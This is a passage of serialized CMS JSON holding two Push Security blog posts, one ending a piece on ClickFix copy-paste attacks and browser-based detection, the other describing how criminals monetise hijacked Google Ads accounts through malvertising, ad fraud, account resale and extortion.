",{"data":24221,"content":24222,"nodeType":945},{},[24223],{"data":24224,"content":24225,"nodeType":860},{},[24226],{"data":24227,"marks":24228,"value":24229,"nodeType":864},{},[],"The PowerShell commands themselves might be obfuscated or broken into stages to avoid easy detection by heuristic rules. EDR telemetry might record that a PowerShell process ran, but without a known bad signature or a clear policy violation, it may not flag it immediately. ",{"data":24231,"content":24235,"nodeType":996},{"target":24232},{"sys":24233},{"id":24234,"type":1001,"linkType":1002},"6djGsqBFTHlLLITpTK7IMk",[],{"data":24237,"content":24238,"nodeType":1312},{},[24239],{"data":24240,"marks":24241,"value":24243,"nodeType":864},{},[24242],{"type":899},"Accessing ClickFix-style capabilities is easier than ever",{"data":24245,"content":24246,"nodeType":860},{},[24247,24251,24259],{"data":24248,"marks":24249,"value":24250,"nodeType":864},{},[],"This capability is increasingly available to all levels of threat actor, with ",{"data":24252,"content":24253,"nodeType":883},{"uri":23886},[24254],{"data":24255,"marks":24256,"value":24258,"nodeType":864},{},[24257],{"type":1455},"off-the-shelf options available",{"data":24260,"marks":24261,"value":24262,"nodeType":864},{},[]," in the form of ClickFix builders (also called “Win + R”) on popular hacker forums since late 2024. ",{"data":24264,"content":24265,"nodeType":860},{},[24266],{"data":24267,"marks":24268,"value":24269,"nodeType":864},{},[],"Attackers are bundling ClickFix builders into their existing kits to:",{"data":24271,"content":24272,"nodeType":941},{},[24273,24283],{"data":24274,"content":24275,"nodeType":945},{},[24276],{"data":24277,"content":24278,"nodeType":860},{},[24279],{"data":24280,"marks":24281,"value":24282,"nodeType":864},{},[],"Use pre-canned landing pages with various lures including Cloudflare. ",{"data":24284,"content":24285,"nodeType":945},{},[24286],{"data":24287,"content":24288,"nodeType":860},{},[24289],{"data":24290,"marks":24291,"value":24292,"nodeType":864},{},[],"Offer construction of malicious commands that users will paste into the Windows Run dialog. ",{"data":24294,"content":24295,"nodeType":860},{},[24296],{"data":24297,"marks":24298,"value":24299,"nodeType":864},{},[],"These kits claim to guarantee antivirus and web protection bypass (some even promise that they can bypass Microsoft Defender SmartScreen), as well as payload persistence. The cost of subscription to such a service might be between US$200 to US$1,500 per month. ",{"data":24301,"content":24302,"nodeType":860},{},[24303],{"data":24304,"marks":24305,"value":24306,"nodeType":864},{},[],"In short, these capabilities are increasingly accessible to the general population of hackers, and it is increasingly in the interests of malware developers to offer premium hacker tools designed to bypass current detections. ",{"data":24308,"content":24312,"nodeType":996},{"target":24309},{"sys":24310},{"id":24311,"type":1001,"linkType":1002},"5hkRsOBZCOABAShCo8RjJg",[],{"data":24314,"content":24315,"nodeType":860},{},[24316],{"data":24317,"marks":24318,"value":24319,"nodeType":864},{},[],"In any case, relying on just-in-time detection at the point of execution is increasingly unreliable and will always be at the mercy of the cat-and-mouse game between attackers and defenders. Organizations employing custom detections looking for specific malware behavior are likely to have better success than those relying on out-of-the-box EDR configs, but this requires continual maintenance to be effective. ",{"data":24321,"content":24322,"nodeType":1005},{},[],{"data":24324,"content":24325,"nodeType":1009},{},[24326],{"data":24327,"marks":24328,"value":24330,"nodeType":864},{},[24329],{"type":899},"Solving ClickFix detection in the browser with Push",{"data":24332,"content":24333,"nodeType":860},{},[24334,24337,24341],{"data":24335,"marks":24336,"value":23985,"nodeType":864},{},[],{"data":24338,"marks":24339,"value":23763,"nodeType":864},{},[24340],{"type":899},{"data":24342,"marks":24343,"value":24344,"nodeType":864},{},[],", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking, with a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.",{"data":24346,"content":24347,"nodeType":860},{},[24348,24352,24361],{"data":24349,"marks":24350,"value":24351,"nodeType":864},{},[],"A key part of our design philosophy is to find ways to universally detect attacker TTPs by analyzing generic attacker actions that can’t be avoided by the attacker. One of our best prior examples of this is with our ",{"data":24353,"content":24355,"nodeType":883},{"uri":24354},"https://pushsecurity.com/blog/introducing-sso-password-protection/",[24356],{"data":24357,"marks":24358,"value":24360,"nodeType":864},{},[24359],{"type":1455},"password protection feature",{"data":24362,"marks":24363,"value":24364,"nodeType":864},{},[],", which detects and blocks phishing attacks by triggering when a user attempts to enter a password that belongs to one domain on a different domain. ",{"data":24366,"content":24367,"nodeType":860},{},[24368],{"data":24369,"marks":24370,"value":24371,"nodeType":864},{},[],"In the case of ClickFix, every attack involves copying a malicious script from a page — a behavior the attacker can’t avoid.",{"data":24373,"content":24374,"nodeType":860},{},[24375],{"data":24376,"marks":24377,"value":24378,"nodeType":864},{},[],"Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity. ",{"data":24380,"content":24381,"nodeType":860},{},[24382],{"data":24383,"marks":24384,"value":24385,"nodeType":864},{},[],"Check out the video below to see Push in action. ",{"data":24387,"content":24390,"nodeType":996},{"target":24388},{"sys":24389},{"id":23786,"type":1001,"linkType":1002},[],{"data":24392,"content":24393,"nodeType":1312},{},[24394],{"data":24395,"marks":24396,"value":24398,"nodeType":864},{},[24397],{"type":899},"Enable ClickFix detection in just a few clicks",{"data":24400,"content":24401,"nodeType":860},{},[24402,24406,24414],{"data":24403,"marks":24404,"value":24405,"nodeType":864},{},[],"Check out the ",{"data":24407,"content":24409,"nodeType":883},{"uri":24408},"https://pushsecurity.com/help/10141/#start",[24410],{"data":24411,"marks":24412,"value":24413,"nodeType":864},{},[],"help article",{"data":24415,"marks":24416,"value":24417,"nodeType":864},{},[]," for step-by-step instructions on how to enable the control. ",{"data":24419,"content":24420,"nodeType":1005},{},[],{"data":24422,"content":24423,"nodeType":1009},{},[24424],{"data":24425,"marks":24426,"value":3578,"nodeType":864},{},[24427],{"type":899},{"data":24429,"content":24430,"nodeType":860},{},[24431],{"data":24432,"marks":24433,"value":24434,"nodeType":864},{},[],"Push provides last mile protection against browser-based attacks, adding a net-new layer of technical protection in the browser. ",{"data":24436,"content":24437,"nodeType":860},{},[24438],{"data":24439,"marks":24440,"value":24441,"nodeType":864},{},[],"Right now, most organizations are left relying on user awareness. Faced with increasingly novel attack types, encountered all over the internet, users are being caught unawares — further reducing the efficacy of an already fragile control. ",{"data":24443,"content":24444,"nodeType":860},{},[24445],{"data":24446,"marks":24447,"value":24448,"nodeType":864},{},[],"By seeing what the user sees in the browser, as they see it, as well as monitoring for risky behaviors, Push provides a strong backstop against an ever-expanding landscape of browser-based exploits. ",{"data":24450,"content":24451,"nodeType":860},{},[24452],{"data":24453,"marks":24454,"value":24455,"nodeType":864},{},[],"Push’s browser-based security platform provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your identity attack surface.",{"data":24457,"content":24458,"nodeType":860},{},[24459,24462,24469,24472,24479],{"data":24460,"marks":24461,"value":16314,"nodeType":864},{},[],{"data":24463,"content":24464,"nodeType":883},{"uri":10269},[24465],{"data":24466,"marks":24467,"value":10275,"nodeType":864},{},[24468],{"type":1455},{"data":24470,"marks":24471,"value":19754,"nodeType":864},{},[],{"data":24473,"content":24474,"nodeType":883},{"uri":1700},[24475],{"data":24476,"marks":24477,"value":10299,"nodeType":864},{},[24478],{"type":1455},{"data":24480,"marks":24481,"value":2924,"nodeType":864},{},[],{"data":24483,"content":24486,"nodeType":996},{"target":24484},{"sys":24485},{"id":24234,"type":1001,"linkType":1002},[],{"data":24488,"content":24489,"nodeType":860},{},[24490],{"data":24491,"marks":24492,"value":21,"nodeType":864},{},[],"Introducing malicious copy and paste detection","Push now detects malware delivery in the browser, supporting a layered defense against endpoint attacks. ","2025-10-09T00:00:00.000Z","introducing-malicious-copy-paste-detection",{"items":24498},[24499,24501],{"sys":24500,"name":342},{"id":6596},{"sys":24502,"name":6593},{"id":6592},{"items":24504},[24505],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":24506},{"url":2740},"blog/installfix",{"json":24509},{"data":24510,"content":24511,"nodeType":856},{},[24512],{"data":24513,"content":24514,"nodeType":860},{},[24515],{"data":24516,"marks":24517,"value":24518,"nodeType":864},{},[],"Attackers are distributing almost identical cloned sites of popular developer tools like Claude Code with fake install instructions via malicious search engine ads — tricking victims into installing infostealer malware instead. ",{"id":9754,"publishedAt":24520},"2026-08-12T13:28:02.181Z",{"items":24522},[24523,24525],{"sys":24524,"name":6593},{"id":6592},{"sys":24526,"name":342},{"id":6596},{"items":24528},[24529,24531,24533,24535,24537,24539,24541,24543,24545,24547,24549,24551],{"sys":24530,"name":279,"slug":280,"tier":31},{"id":276},{"sys":24532,"name":519,"slug":520,"tier":31},{"id":516},{"sys":24534,"name":342,"slug":343,"tier":31},{"id":339},{"sys":24536,"name":642,"slug":643,"tier":31},{"id":639},{"sys":24538,"name":315,"slug":316,"tier":45},{"id":312},{"sys":24540,"name":440,"slug":441,"tier":45},{"id":437},{"sys":24542,"name":607,"slug":608,"tier":45},{"id":604},{"sys":24544,"name":448,"slug":449,"tier":45},{"id":445},{"sys":24546,"name":422,"slug":423,"tier":45},{"id":419},{"sys":24548,"name":431,"slug":432,"tier":45},{"id":428},{"sys":24550,"name":475,"slug":476,"tier":45},{"id":472},{"sys":24552,"name":244,"slug":245,"tier":45},{"id":241},"bhqwswrCKY8XUOeyfqgrT_bbdwMvlm25CtqySFe4ADE",{"id":24555,"title":24556,"authorsCollection":24557,"content":24562,"extension":228,"faqItemsCollection":25187,"faqTitle":59,"featured":6,"hashTags":59,"meta":25189,"metaTitle":25190,"ogImage":59,"postType":5740,"publishedDate":21281,"relatedBlogPostsCollection":25191,"slug":27246,"stem":27247,"subtitle":59,"summary":27248,"synopsis":27258,"sys":27259,"tagsCollection":27262,"topicsCollection":27268,"__hash__":27296},"blog/blog/cyber-criminal-ecosystem-analysis.json","How cyber criminals power malvertising scams with stolen accounts",{"items":24558},[24559],{"fullName":2736,"firstName":2737,"jobTitle":2738,"socialLinks":24560,"profilePicture":24561},[18135],{"url":2740},{"json":24563,"links":25033},{"data":24564,"content":24565,"nodeType":856},{},[24566,24573,24579,24641,24644,24651,24657,24663,24670,24677,24680,24687,24702,24708,24715,24781,24788,24794,24801,24807,24810,24818,24825,24832,24839,24846,24852,24855,24863,24870,24877,24884,24913,24920,24926,24929,24937,24944,24951,24958,24961,24969,24976,24983,24989,24995,25022,25027],{"data":24567,"content":24568,"nodeType":860},{},[24569],{"data":24570,"marks":24571,"value":24572,"nodeType":864},{},[],"In recent months, we’ve seen a significant increase in the number of attacks targeting ad manager accounts. These attacks range from phishing campaigns against marketing professionals to malicious sites impersonating legitimate marketing tools — ultimately serving up an Attacker-in-the-Middle (AITM) phishing page designed to steal the victim’s Google account. ",{"data":24574,"content":24575,"nodeType":860},{},[24576],{"data":24577,"marks":24578,"value":20698,"nodeType":864},{},[],{"data":24580,"content":24581,"nodeType":941},{},[24582,24601,24620],{"data":24583,"content":24584,"nodeType":945},{},[24585],{"data":24586,"content":24587,"nodeType":860},{},[24588,24591,24598],{"data":24589,"marks":24590,"value":20711,"nodeType":864},{},[],{"data":24592,"content":24593,"nodeType":883},{"uri":20714},[24594],{"data":24595,"marks":24596,"value":20720,"nodeType":864},{},[24597],{"type":1455},{"data":24599,"marks":24600,"value":20724,"nodeType":864},{},[],{"data":24602,"content":24603,"nodeType":945},{},[24604],{"data":24605,"content":24606,"nodeType":860},{},[24607,24610,24617],{"data":24608,"marks":24609,"value":20734,"nodeType":864},{},[],{"data":24611,"content":24612,"nodeType":883},{"uri":20737},[24613],{"data":24614,"marks":24615,"value":20743,"nodeType":864},{},[24616],{"type":1455},{"data":24618,"marks":24619,"value":20747,"nodeType":864},{},[],{"data":24621,"content":24622,"nodeType":945},{},[24623],{"data":24624,"content":24625,"nodeType":860},{},[24626,24630,24638],{"data":24627,"marks":24628,"value":24629,"nodeType":864},{},[],"A continuation of the Google Ads malvertising campaign, ",{"data":24631,"content":24633,"nodeType":883},{"uri":24632},"https://pushsecurity.com/blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs",[24634],{"data":24635,"marks":24636,"value":24637,"nodeType":864},{},[],"this time impersonating Ahrefs",{"data":24639,"marks":24640,"value":10094,"nodeType":864},{},[],{"data":24642,"content":24643,"nodeType":1005},{},[],{"data":24645,"content":24646,"nodeType":1009},{},[24647],{"data":24648,"marks":24649,"value":20869,"nodeType":864},{},[24650],{"type":899},{"data":24652,"content":24653,"nodeType":860},{},[24654],{"data":24655,"marks":24656,"value":20876,"nodeType":864},{},[],{"data":24658,"content":24659,"nodeType":860},{},[24660],{"data":24661,"marks":24662,"value":20883,"nodeType":864},{},[],{"data":24664,"content":24665,"nodeType":860},{},[24666],{"data":24667,"marks":24668,"value":24669,"nodeType":864},{},[],"A hijacked Google Ad Manager account gives attackers access to significant ad spend and account data which can be monetized. The tactics range from stealthy ad fraud to overt abuse like malicious ads or extortion schemes.",{"data":24671,"content":24672,"nodeType":860},{},[24673],{"data":24674,"marks":24675,"value":24676,"nodeType":864},{},[],"Here’s how attackers can profit from a compromised ad manager account — and how it impacts your business. ",{"data":24678,"content":24679,"nodeType":1005},{},[],{"data":24681,"content":24682,"nodeType":1312},{},[24683],{"data":24684,"marks":24685,"value":440,"nodeType":864},{},[24686],{"type":899},{"data":24688,"content":24689,"nodeType":860},{},[24690,24694,24698],{"data":24691,"marks":24692,"value":24693,"nodeType":864},{},[],"Arguably the most dangerous use of a compromised ad manager account is to conduct ",{"data":24695,"marks":24696,"value":441,"nodeType":864},{},[24697],{"type":899},{"data":24699,"marks":24700,"value":24701,"nodeType":864},{},[]," – inserting malicious ads or redirects in place of legitimate advertisements. ",{"data":24703,"content":24704,"nodeType":860},{},[24705],{"data":24706,"marks":24707,"value":20939,"nodeType":864},{},[],{"data":24709,"content":24710,"nodeType":860},{},[24711],{"data":24712,"marks":24713,"value":24714,"nodeType":864},{},[],"The goal here is usually to compromise more devices and accounts, via:",{"data":24716,"content":24717,"nodeType":941},{},[24718,24728,24738,24771],{"data":24719,"content":24720,"nodeType":945},{},[24721],{"data":24722,"content":24723,"nodeType":860},{},[24724],{"data":24725,"marks":24726,"value":24727,"nodeType":864},{},[],"AITM phishing sites looking to hijack sessions on valuable accounts — usually enterprise SSO accounts such as Google or Microsoft, but also many high-value SaaS services, as well as logins for banking and cryptocurrency sites.. ",{"data":24729,"content":24730,"nodeType":945},{},[24731],{"data":24732,"content":24733,"nodeType":860},{},[24734],{"data":24735,"marks":24736,"value":24737,"nodeType":864},{},[],"Deploying infostealer malware, harvesting credentials and user sessions from the compromised device to enable broad access to apps via compromised accounts. ",{"data":24739,"content":24740,"nodeType":945},{},[24741],{"data":24742,"content":24743,"nodeType":860},{},[24744,24748,24755,24759,24767],{"data":24745,"marks":24746,"value":24747,"nodeType":864},{},[],"Running ",{"data":24749,"content":24750,"nodeType":883},{"uri":13019},[24751],{"data":24752,"marks":24753,"value":315,"nodeType":864},{},[24754],{"type":1455},{"data":24756,"marks":24757,"value":24758,"nodeType":864},{},[],"-style social engineering scams prompting users to perform a malicious action (typically running code on their device, although a new browser-native version of this attack in the form of ",{"data":24760,"content":24761,"nodeType":883},{"uri":6036},[24762],{"data":24763,"marks":24764,"value":24766,"nodeType":864},{},[24765],{"type":1455},"ConsentFix ",{"data":24768,"marks":24769,"value":24770,"nodeType":864},{},[],"was recently discovered by Push researchers).",{"data":24772,"content":24773,"nodeType":945},{},[24774],{"data":24775,"content":24776,"nodeType":860},{},[24777],{"data":24778,"marks":24779,"value":24780,"nodeType":864},{},[],"Infecting machines with malicious software to siphon compute power for cryptomining or adding the device to a botnet used in DDOS attacks. ",{"data":24782,"content":24783,"nodeType":860},{},[24784],{"data":24785,"marks":24786,"value":24787,"nodeType":864},{},[],"Harvested data can be used by the attacker directly to conduct cyber attacks, but is more commonly sold on to other criminals further up the supply chain. So, attackers are using compromised ad accounts, to take over more accounts used to manage ads, to take over even more accounts… You can see how this can quickly snowball into something hugely profitable for attackers. ",{"data":24789,"content":24793,"nodeType":996},{"target":24790},{"sys":24791},{"id":24792,"type":1001,"linkType":1002},"1Ji0oUqCZvgmQIT2VWNgjQ",[],{"data":24795,"content":24796,"nodeType":860},{},[24797],{"data":24798,"marks":24799,"value":24800,"nodeType":864},{},[],"Malvertising scams don’t just target ad manager accounts either. They can be found targeting all manner of sites. But all malvertising scams are underpinned by ad spending — so it makes sense that attackers are looking to harvest account access and make use of the pre-allocated marketing spend of their victims. ",{"data":24802,"content":24806,"nodeType":996},{"target":24803},{"sys":24804},{"id":24805,"type":1001,"linkType":1002},"7qpSbkJxLeo7zD400cvQyv",[],{"data":24808,"content":24809,"nodeType":1005},{},[],{"data":24811,"content":24812,"nodeType":1312},{},[24813],{"data":24814,"marks":24815,"value":24817,"nodeType":864},{},[24816],{"type":899},"Ad fraud",{"data":24819,"content":24820,"nodeType":860},{},[24821],{"data":24822,"marks":24823,"value":24824,"nodeType":864},{},[],"One of the most common motives for hacking ad accounts is ad fraud – generating fake ad impressions or clicks to illicitly collect advertising revenue. By hijacking a Google Ad Manager account, criminals can direct the account’s ad spend to their own fraudulent web pages.",{"data":24826,"content":24827,"nodeType":860},{},[24828],{"data":24829,"marks":24830,"value":24831,"nodeType":864},{},[],"When a Google Ads/Ad Manager account is compromised, attackers can create new campaigns or modify existing ones. By directing traffic to websites the criminals control (often low quality sites made specifically for advertising) the victim’s ad budget can be funnelled into the attackers’ pockets as ad revenue.",{"data":24833,"content":24834,"nodeType":860},{},[24835],{"data":24836,"marks":24837,"value":24838,"nodeType":864},{},[],"The hijacked ad accounts provide a means to introduce fraudulent traffic into legitimate ad ecosystems, often escaping immediate detection thanks to the account’s established trust or high spending thresholds. For example, a compromised account with a large budget can run thousands of ads pointing to fraudulent sites before being flagged. ",{"data":24840,"content":24841,"nodeType":860},{},[24842],{"data":24843,"marks":24844,"value":24845,"nodeType":864},{},[],"This is often abused as a channel for money laundering. An attacker can inject dirty money into the ad ecosystem (for example, using a compromised advertiser account’s billing) and then receive clean money out the other end (as payments to a publisher or ad partner account they control). ",{"data":24847,"content":24851,"nodeType":996},{"target":24848},{"sys":24849},{"id":24850,"type":1001,"linkType":1002},"21ryRzAB91llJXOVlkdiv5",[],{"data":24853,"content":24854,"nodeType":1005},{},[],{"data":24856,"content":24857,"nodeType":1312},{},[24858],{"data":24859,"marks":24860,"value":24862,"nodeType":864},{},[24861],{"type":899},"Selling or sharing access with other criminal groups ",{"data":24864,"content":24865,"nodeType":860},{},[24866],{"data":24867,"marks":24868,"value":24869,"nodeType":864},{},[],"Stolen advertising accounts themselves have become a commodity in the underground economy. Instead of (or in addition to) exploiting the account personally, a hacker might sell access to the compromised Ad Manager account on criminal forums. ",{"data":24871,"content":24872,"nodeType":860},{},[24873],{"data":24874,"marks":24875,"value":24876,"nodeType":864},{},[],"There is strong demand for reputable ad accounts because they come with advantages: high spending limits, established credit card billing, a history of compliance (making them less likely to be flagged by Google’s fraud detection), and existing relationships with ad networks or clients. In other words, a hijacked account is a ready-made vehicle for anyone looking to run malicious ad campaigns without going through the usual vetting.",{"data":24878,"content":24879,"nodeType":860},{},[24880],{"data":24881,"marks":24882,"value":24883,"nodeType":864},{},[],"Access to a Google Ads account (especially one with a good track record or high credit threshold) can fetch a significant price in criminal markets. Compromised Google ad accounts have shown up for sale on hacker forums and darknet markets, often advertised with details like the account’s age, billing history, or spend limit. For example, a hacker on one forum might sell or rent a “2-year-old Google Ads account with $50k monthly spend history” for a price commensurate with its potential yield.",{"data":24885,"content":24886,"nodeType":860},{},[24887,24891,24900,24904,24909],{"data":24888,"marks":24889,"value":24890,"nodeType":864},{},[],"The previously mentioned ",{"data":24892,"content":24894,"nodeType":883},{"uri":24893},"https://cloud.google.com/blog/topics/threat-intelligence/vietnamese-actors-fake-job-posting-campaigns",[24895],{"data":24896,"marks":24897,"value":24899,"nodeType":864},{},[24898],{"type":1455},"Vietnamese threat group",{"data":24901,"marks":24902,"value":24903,"nodeType":864},{},[]," would ",{"data":24905,"marks":24906,"value":24908,"nodeType":864},{},[24907],{"type":899},"“either sell ads to other actors, or sell the accounts themselves to other actors to monetize”",{"data":24910,"marks":24911,"value":24912,"nodeType":864},{},[],". This means an attacker could use a compromised account as a platform to sell fraudulent ad placements (e.g. “pay us and we’ll run your ads via this legitimate account for X days”). If not, they just sell the whole account login to the highest bidder.",{"data":24914,"content":24915,"nodeType":860},{},[24916],{"data":24917,"marks":24918,"value":24919,"nodeType":864},{},[],"It’s also worth noting that a Google Ad Manager account is also an enterprise SSO account that can be used to access broader Google Workspace services, and any SaaS apps accessible via SSO. ",{"data":24921,"content":24925,"nodeType":996},{"target":24922},{"sys":24923},{"id":24924,"type":1001,"linkType":1002},"1RrDk0VMWNGwPPEc8wIZWM",[],{"data":24927,"content":24928,"nodeType":1005},{},[],{"data":24930,"content":24931,"nodeType":1312},{},[24932],{"data":24933,"marks":24934,"value":24936,"nodeType":864},{},[24935],{"type":899},"Data theft and extortion",{"data":24938,"content":24939,"nodeType":860},{},[24940],{"data":24941,"marks":24942,"value":24943,"nodeType":864},{},[],"Most ad accounts contain valuable data – like audience lists, conversion data, or payment info. Attackers could exfiltrate this data and extort the victim by threatening to leak it or sell it (though this borders on a data breach scenario, it’s another way to extort via an ad account hack, especially for large advertising agencies handling many clients’ data).",{"data":24945,"content":24946,"nodeType":860},{},[24947],{"data":24948,"marks":24949,"value":24950,"nodeType":864},{},[],"An attacker might also threaten to manipulate the account in ways that hurt the victim financially. For instance, they could create fake campaigns that burn through the budget on useless traffic (driving up costs with nothing to show, or even causing overcharges). They could also threaten to click-bomb the victim’s ads (if it’s an advertiser account) so that Google’s systems detect invalid activity and suspend the account. ",{"data":24952,"content":24953,"nodeType":860},{},[24954],{"data":24955,"marks":24956,"value":24957,"nodeType":864},{},[],"For the victim, the cost of reputational damage or lost advertising time can far exceed the ransom demand, which is why some might contemplate paying. A large brand could lose consumer confidence or partner relationships if their ads serve malware for even a short time. Agencies managing several client ad accounts could face client complaints and legal liability if an attack spreads offensive ads via their accounts – such agencies have noted the “serious financial threats” and client dissatisfaction resulting from ad account breaches.",{"data":24959,"content":24960,"nodeType":1005},{},[],{"data":24962,"content":24963,"nodeType":1009},{},[24964],{"data":24965,"marks":24966,"value":24968,"nodeType":864},{},[24967],{"type":899},"Conclusion",{"data":24970,"content":24971,"nodeType":860},{},[24972],{"data":24973,"marks":24974,"value":24975,"nodeType":864},{},[],"Pretty much every enterprise today advertises their services via Google ads — this makes attacks on these accounts a unanimous problem. Agencies managing numerous client accounts are put further at risk. For example, if an attacker can compromise an MCC account (used to manage several ad accounts) they get full access to the agency’s customer portfolio. ",{"data":24977,"content":24978,"nodeType":860},{},[24979],{"data":24980,"marks":24981,"value":24982,"nodeType":864},{},[],"Organisations need to be on guard against both attacks on accounts used to manage ads, and malvertising in general — which is an incredibly prevalent threat and one of the top delivery vectors for phishing attacks today. Malvertising attacks delivered over channels like Google Search are a great way to catch victims unawares while also evading typically email-based anti-phishing controls. ",{"data":24984,"content":24985,"nodeType":860},{},[24986],{"data":24987,"marks":24988,"value":21000,"nodeType":864},{},[],{"data":24990,"content":24994,"nodeType":996},{"target":24991},{"sys":24992},{"id":24993,"type":1001,"linkType":1002},"3VJGhlTaAAOyJckK2yUfZd",[],{"data":24996,"content":24997,"nodeType":860},{},[24998,25002,25009,25012,25019],{"data":24999,"marks":25000,"value":25001,"nodeType":864},{},[],"To learn more about how Push tackles browser-based threats, ",{"data":25003,"content":25004,"nodeType":883},{"uri":10269},[25005],{"data":25006,"marks":25007,"value":10275,"nodeType":864},{},[25008],{"type":1455},{"data":25010,"marks":25011,"value":19754,"nodeType":864},{},[],{"data":25013,"content":25014,"nodeType":883},{"uri":1700},[25015],{"data":25016,"marks":25017,"value":10299,"nodeType":864},{},[25018],{"type":1455},{"data":25020,"marks":25021,"value":2924,"nodeType":864},{},[],{"data":25023,"content":25026,"nodeType":996},{"target":25024},{"sys":25025},{"id":23255,"type":1001,"linkType":1002},[],{"data":25028,"content":25029,"nodeType":860},{},[25030],{"data":25031,"marks":25032,"value":21,"nodeType":864},{},[],{"entries":25034},{"hyperlink":25035,"inline":25036,"block":25037},[],[],[25038,25044,25058,25136,25170,25183],{"sys":25039,"__typename":1724,"title":25040,"caption":25041,"layoutMode":59,"file":25042},{"id":24792},"Propagation of malvertising","It’s easy to see how malicious ads can propagate and turn into more malicious ads, leading to more campaigns impersonating more brands, more account compromises, and so on. ",{"url":25043,"width":1736,"height":1737},"https://images.ctfassets.net/y1cdw1ablpvd/3iUNORa8hHXi68kZAsFxi8/1a742458ae768bc14a1ba1f6cf26de41/image1.png",{"sys":25045,"__typename":1740,"content":25046,"name":25057,"title":59},{"id":24805},{"json":25047},{"nodeType":856,"data":25048,"content":25049},{},[25050],{"nodeType":860,"data":25051,"content":25052},{},[25053],{"nodeType":864,"value":25054,"marks":25055,"data":25056},"Large enterprises spend vast amounts on Google Ads, often starting at $20,000+ per month, with major brands sometimes spending $40 to $50 million annually, depending heavily on their competitive industry. So, there’s a lot to play with for an attacker — and it might be some time before a discrepancy is noticed by the victim. ",[],{},"Malvertising insight box 4",{"sys":25059,"__typename":1740,"content":25060,"name":25135,"title":59},{"id":24850},{"json":25061},{"nodeType":856,"data":25062,"content":25063},{},[25064,25092],{"nodeType":860,"data":25065,"content":25066},{},[25067,25071,25079,25083,25088],{"nodeType":864,"value":25068,"marks":25069,"data":25070},"In late 2025, agencies noticed a surge of Google Ads account takeovers where hackers ran unauthorized campaigns until budgets were exhausted. ",[],{},{"nodeType":883,"data":25072,"content":25073},{"uri":24893},[25074],{"nodeType":864,"value":25075,"marks":25076,"data":25078},"Google’s Threat Analysis Group found a cluster of Vietnamese actors",[25077],{"type":1455},{},{"nodeType":864,"value":25080,"marks":25081,"data":25082}," who hijacked marketing accounts to ",[],{},{"nodeType":864,"value":25084,"marks":25085,"data":25087},"“either sell ads to other actors, or sell the accounts themselves”",[25086],{"type":899},{},{"nodeType":864,"value":25089,"marks":25090,"data":25091}," for profit. ",[],{},{"nodeType":860,"data":25093,"content":25094},{},[25095,25099,25108,25112,25121,25125,25132],{"nodeType":864,"value":25096,"marks":25097,"data":25098},"Similarly, a series of attacks on companies managing ads ",[],{},{"nodeType":883,"data":25100,"content":25102},{"uri":25101},"https://www.adexchanger.com/online-advertising/people-managing-google-ad-campaigns-are-getting-their-accounts-seized-by-scammers/",[25103],{"nodeType":864,"value":25104,"marks":25105,"data":25107},"reported that their accounts had been hacked as early as January 2025",[25106],{"type":1455},{},{"nodeType":864,"value":25109,"marks":25110,"data":25111},". These attacks were linked to ",[],{},{"nodeType":883,"data":25113,"content":25115},{"uri":25114},"https://www.malwarebytes.com/blog/news/2025/01/the-great-google-ads-heist-criminals-ransack-advertiser-accounts-via-fake-google-ads",[25116],{"nodeType":864,"value":25117,"marks":25118,"data":25120},"South American scam operations by MalwareBytes",[25119],{"type":1455},{},{"nodeType":864,"value":25122,"marks":25123,"data":25124}," — likely the same group behind ",[],{},{"nodeType":883,"data":25126,"content":25127},{"uri":24632},[25128],{"nodeType":864,"value":25129,"marks":25130,"data":25131},"the attacks we recently identified",[],{},{"nodeType":864,"value":10094,"marks":25133,"data":25134},[],{},"Malvertising insight box 1",{"sys":25137,"__typename":1740,"content":25138,"name":25169,"title":59},{"id":24924},{"json":25139},{"data":25140,"content":25141,"nodeType":856},{},[25142],{"data":25143,"content":25144,"nodeType":860},{},[25145,25149,25154,25164],{"data":25146,"marks":25147,"value":25148,"nodeType":864},{},[],"Even if the victim isn’t predominantly a Google shop, a Google account using the same email as a different identity provider account (e.g. Microsoft) can still be used to access downstream apps via SSO. This is because most apps use the email itself as the identifier, while 3 in 5 allow you to access an account using a new login method without doing any further verification checks. ",{"data":25150,"marks":25151,"value":25153,"nodeType":864},{},[25152],{"type":899},"Read our ",{"data":25155,"content":25157,"nodeType":883},{"uri":25156},"https://pushsecurity.com/blog/cross-idp-impersonation/",[25158],{"data":25159,"marks":25160,"value":25163,"nodeType":864},{},[25161,25162],{"type":1455},{"type":899},"blog post on cross-IdP impersonation",{"data":25165,"marks":25166,"value":25168,"nodeType":864},{},[25167],{"type":899}," for more information. ","Malvertising insight box 2",{"sys":25171,"__typename":1740,"content":25172,"name":25182,"title":59},{"id":24993},{"json":25173},{"nodeType":856,"data":25174,"content":25175},{},[25176],{"nodeType":860,"data":25177,"content":25178},{},[25179],{"nodeType":864,"value":21007,"marks":25180,"data":25181},[],{},"Malvertising insight box 3",{"sys":25184,"__typename":1717,"type":1718,"ctaText":25185,"buttonLabel":1720,"buttonColour":1721,"buttonUrl":25186},{"id":23255},"Want to see how security controls match up with modern browser-based attacks? Register for our upcoming webinar for an interactive walkthrough.","https://pushsecurity.com/webinar/investigating-browser-threats",{"items":25188},[],{},"Analysing the malvertising criminal 